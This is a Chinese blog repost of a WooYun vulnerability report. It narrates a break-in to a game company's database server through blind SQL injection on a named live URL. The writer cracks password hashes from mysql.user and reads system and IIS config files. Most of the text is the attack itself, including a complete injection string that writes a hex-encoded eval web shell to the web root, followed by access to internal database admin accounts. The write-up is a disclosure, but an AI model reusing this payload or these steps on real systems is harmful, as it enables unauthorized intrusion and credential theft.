记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

我是如何近距离接触电魂数据库的

2015-07-10 07:50

从一个盲注开始

http://dj.17m3.com/game.aspx?sercon=*



code 区域
back-end DBMS: MySQL 5.0.11



code 区域
current user:    'root\\@122.224.197.%'



竟然是root

mysql.user读出来帐号密码,成功解密了2个

上神器cloudeye

一个劲的读/etc/sysconfig/network-scripts/ifcfg-eth0,/etc/passwd

然后一个劲的报错

手贱HEX读了下c:/windows/system32/cmd.exe 发现竟然有返回,竟然是windows、win主机cloudeye不是应该能返回apache日志ip的么但是这里确实没有。

继续

从C:\WINDOWS\system32\LogFiles\HTTPERR\httperr1.log中读出来ip

发现数据库服务器上还有iis

读C:\WINDOWS\system32\inetsrv\MetaBase.xml

得到一个主机头跟目录

写shell

code 区域
http://dj.17m3.com/game.aspx?sercon=%' LIMIT 0,1 INTO OUTFILE 'F:/TenMinBreak/wwwroot/edm.mail.m3guocdn.com/bbb.aspx' LINES TERMINATED BY 0x68693C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B2261626364225D2C22756E7361666522293B253E--  AND '%'='



上菜刀。

各种内网sa,root。

这台数据库服务器太丰富了,没敢再进一步深入了。

漏洞证明:

1.gif

2.gif

3.gif

4.gif

5.gif

修复方案:

最起码别数据库服务器放公网了。

知识来源: www.wooyun.org/bugs/wooyun-2015-0116153

阅读:114200 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“我是如何近距离接触电魂数据库的”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云